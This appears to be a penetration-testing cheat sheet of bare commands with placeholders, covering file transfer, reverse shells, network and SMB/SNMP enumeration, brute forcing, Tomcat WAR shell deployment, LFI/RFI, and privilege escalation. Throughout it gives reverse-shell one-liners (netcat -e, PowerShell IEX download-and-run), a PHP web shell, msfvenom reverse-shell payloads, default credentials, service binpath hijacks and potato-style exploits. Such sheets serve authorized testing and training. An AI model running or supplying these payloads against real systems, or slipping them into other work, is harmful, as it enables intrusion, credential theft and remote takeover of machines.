Python HTTP Server: python -m SimpleHTTPServer [PORT]
Python FTP Server: python -m pyftpdlib -p 21
Linux Listener: nc -lnvp [PORT]
Windows Listener: nc.exe -lnvcp [PORT]
Searching for Exploits/Vulnerabilities: searchsploit [APPLICATION]
Downloading Exploits From searchsploit searchsploit -x [EXPLOIT_CODE] > [EXPLOIT.EXTENSION]
curl [URL] -o [FILENAME]
curl -X PUT http://[IP]/[FILE] -d @[FILE] -v
wget [URL]
powershell Invoke-RestMethod -Uri '[URL]' -OutFile '[PATH\TO\FILE]'
powershell IEX(New-Object Net.WebClient).DownloadString('[URL]')
PowerShell 2: powershell IEX((New-Object Net.WebClient).DownloadFile('[URL]', '[PATH\TO\FILE]'))
Download: nc -lnvp [PORT] > [OUT_FILE]
Upload: nc -nv [IP] [PORT] < [IN_FILE]
Linux: nc -nv [IP] [PORT] -e /bin/bash
Windows: nc.exe -nv [IP] [PORT] -e cmd.exe
Establish the SMB Share on Your Local Machine: sudo impacket share .
Download (Local Machine -> Target Machine): copy \[LOCAL_IP]\share[FILE] [C:\OUTPUT\LOCATION]
Upload (Target Machine -> Local Machine): copy [FILE] \[LOCAL_IP]\share[FILE]
Download: certutil -urlcache -f http/s://[LOCAL_IP]/[FILE] [C:\OUTPUT\LOCATION]
PayloadsAllTheThings Reverse Shells
Follow steps found here
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=screen
Background the shell with Ctrl+Z
stty raw -echo
Foreground the shell with fg
Hit Return 2x
-A: OS Fingerprinting
-O: OS Detection
-sV: Service Version/Enumeration
-sC: Enables Safe Scripts
-Pn: Avoids Ping Scans
-sS: Stealth Scan / SYN Scan
-sU: UDP Scan
-v/-vv/-vvv: Varying Levels of Verbosity
-T[1-5]: Speed of Scan (5 Being the Fastest)
-p [PORT(S)]: Specify Port, or Provide Comma Separated List of Ports
-p-: Full Port Scan
nmap -v -sS -sC -sV -T4 -Pn -oA nmap/[filename.tcp] -p- [IP]
nmap -sU -v -sC -sV -T4 -Pn -oA nmap/[filename.udp] [IP]
dnsenum [DOMAIN]
dnsrecon -d [DOMAIN]
dnsrecon -d [DOMAIN] -a
nmap -p 139,445 -Pn -script=smb-vuln* [IP]
smbclient -L //[IP]/
enum4linux -a [IP]
smbmap -H [IP]
./smbver.sh [IP] Found Here
Logging into SMB Share
smbclient //[IP]/[SHARE]
Downloading all files from a directory
smbclient //[IP]/[SHARE] -U [USER] -c "prompt OFF;recurse ON;mget *"
snmpwalk -c [COMMNITY_STRING] -v[SNMP_VERSION] [IP]
onesixtyone -c [COMMNITY_STRING] -i [IPS]
snmp-check [IP]
System Processes: 1.3.6.1.2.1.25.1.6.0
Running Programs: 1.3.6.1.2.1.25.4.2.1.2
Processes Path: 1.3.6.1.2.1.25.4.2.1.4
Storage Units: 1.3.6.1.2.1.25.2.3.1.4
Software Name: 1.3.6.1.2.1.25.6.3.1.2
User Accounts: 1.3.6.1.4.1.77.1.2.25
TCP Local Ports: 1.3.6.1.2.1.6.13.1.3
snmpwalk -c [COMMNITY_STRING] -v[SNMP_VERSION] [IP] [MIB_VALUE]
dirb [URL]
nikto -h [URL]
cewl [URL]
hydra -l/-L [USERNAME/USER_LIST] -P [PASSWORDLIST] [IP] http-form-post "[ENDPOINT]:[POST_PARAMETERS]&User=^USER^&Password=^PASS^:[FAILED_LOGIN_ERROR]."
wpscan --rua -e --url [URL]
wpscan --rua --url [URL] -P [PASSWORDS_LIST] -U "[USER],[USER]"
admin:admin
tomcat:tomcat
admin:[NOTHING]
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
wget 'http://[USER]:[password]@[IP]:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
curl -v -u [USER]:[PASSWORD] -T shell.war 'http://[IP]:8080/manager/text/deploy?path=/shellh&update=true'
http://[VULN_IP]/[VULN_PAGE]?[VULN_PARAMETER]=../../../../[PATH/TO/LOCAL/FILE]
Linux: /home/pharo/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
Windows: /home/pharo/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
Both: /home/pharo/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
<?php echo shell_exec($_GET['cmd']); ?>
Store in a file on local host, navigate to it via the web app and pass commands to it.
http://[VULN_IP]/[VULN_PAGE]?[VULN_PARAMETER]=http://[LOCAL_IP]/rfi.txt&cmd=[COMMAND]
hydra -V -f -L [USER_LIST] -P [PASSWORDS_LIST] ftp://[IP] -u -vV
ftp [IP]
>PASSIVE
>BINARY
>get [FILE]
ftp [IP]
>PASSIVE
>BINARY
>put [FILE]
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
Use exploit found here
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe -o shell.exe
Change the USERNAME = '' line to USERNAME = '//'
Uncomment the smb_send_file(...) and the service_exe(...)
Modify them to upload and execute the payload file
Use listener
nc -lnvp [PORT]
Use exploit found here
Both Nishang and Empire have a suite of PowerShell tools.
Use the Empire Invoke-MS16-032.ps1
Use Nishang's Invoke-PowerShellTcp.ps1 for reverse shell payload.
Add the following line to the bottom of the Invoke-PowerShellTcp.ps1 script:
Invoke-PowerShellTcp -Reverse -IPAddress [LOCAL_IP] -Port [PORT]
Add the following to the bottom of the Invoke-MS16-032 script:
Invoke-MS16-032 -Command "IEX(New-Object Net.WebClient).DownloadString('[URL]/[REVERSEHLL_PAYLOAD')"
Execute on the host by running the following:
powershell IEX(New-Object Net.WebClient).DownloadString('[URL]/Invoke-MS16-032.ps1')
Windows x86: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows -o shell.c
Windows x64: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x64 --platform windows -o shell.c
Replace shell code in the script
Execute the script
python ms08_067_2018.py [IP] [OS_OPTION] [PORT]
Use listener
nc -lnvp [PORT]
- (r)ead = Read permission only allow the user to read the content.
- (x)Execute = The user has permission to execute the program.
- (w)Write = The user can modify or delete the file/program.
- (s)SUID = File Executed with same privilege of the owner(For example root).
- (s)SGID = File Executed with same privilege of the group
Get kernel information: uname -a
Get Host information: hostname
Get current IP address: ip add
Current User: whoami
List Users Bash Access: cat /etc/passwd | grep bash
List User Groups: cat /etc/group
Check Access to Restricted Files: cat /etc/shadow
Check History Files: cat ~/.bash_history
Search for Files Related to Passwords: locate password | more
Search for Authorized SSH Keys: find / -name authorized_keys 2> /dev/null
Search for SSH Keys: find / -name id_rsa 2> /dev/null
List Installed Software: dpkg -l
Detailed Info on Software: dpkg -l | grep [SOFTWARE_NAME]
Curernt User: ps aux | grep [USER]
Root User: ps aux | grep root
crontab -l
- /etc/cron*
- /etc/init.d
- /etc/crontab
- /etc/cron.allow
- /etc/cron.d
- /etc/cron.daily
- /etc/cron.hourly
- /etc/cron.monthly
- /etc/cron.weekly
- /var/spool/cron
- /var/spool/cron/crontabs
LinPEAS.sh Found here
LinEnum.sh Found here
linux-exploit-suggestor Found here
SharUp.exe Found here
Sherlock.ps1 Found here
WinPEAS.exe Found here
Found here (pre-compile binaries)
For Windows 7 SP1 x86 Build 7601 use the source code here. This will need to be compiled in Visual Studio 2017
- Windows 7 Enterprise
- Windows 8.1 Enterprise
- Windows 10 Enterprise
- Windows 10 Professional
- Windows Server 2008 R2 Enterprise
- Windows Server 2012 Datacenter
- Windows Server 2016 Standard
SeImpersonateSeAssignPrimaryToken
Windows x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LOCAL-IP] LPORT=[PORT] -f exe -o shell.exe
Windows x82: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL-IP] LPORT=[PORT] -f exe -o shell.exe
Create the listener to cath the payload
nc -lnvp [PORT]
Run the exploit on the target host.
JuicyPotato.exe -l 1337 -p [DIR\TO\PAYLOAD] -t * -c {CLSID}
Upload accesschk.exe and nc.exe to the target host.
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
Running the following gives more information about the specified service (i.e. what groups have what permissions over it).
accesschk.exe /accepteula -ucqv [SERVICE]
To see the start type, dependencies, and binary path the service uses:
sc qc [SERVICE]
Check the status of the service.
sc query [SERVICE]
If needed, change the start type of the service
sc config [SERVICE] start= auto
Changing the binary path:
sc config [SERVICE] binpath= [PATH\TO\nc.exe [KALI IP] [PORT] -e C:\WINDOWS\System32\cmd.exe]
Setup the netcat listener and start the service.
Starting / Stopping the Service
net start [SERVICE]
net stop [SERVICE]
Exploit can be found here(Pre-Compiled)
- Windows 10
- Windows Server 2016
- Windows Server 2019
SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd
- MS16-014: applies to Windows 7 SP1 x86
- MS16-016: ‘WebDAV’ applies to Windows 7 SP1 x86 (Build 7601)
- MS16-032: Applies to Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2
- CVE-2020-0796: applies to SMBv3 Enabled on Windows Operation Systems
- MS16-075
- CVE-2019-1388
msfvenom -p linux/x86/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f elf > shell.elf
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe > shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe > shell.exe
msfvenom -p windows/x82/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe > shell.exe
msfvenom -p php/reverse_php LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.php
Append <?php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f war > shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f asp > shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f asp-exe > shell.aspx
msfvenom -p cmd/unix/reverse_python LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.pl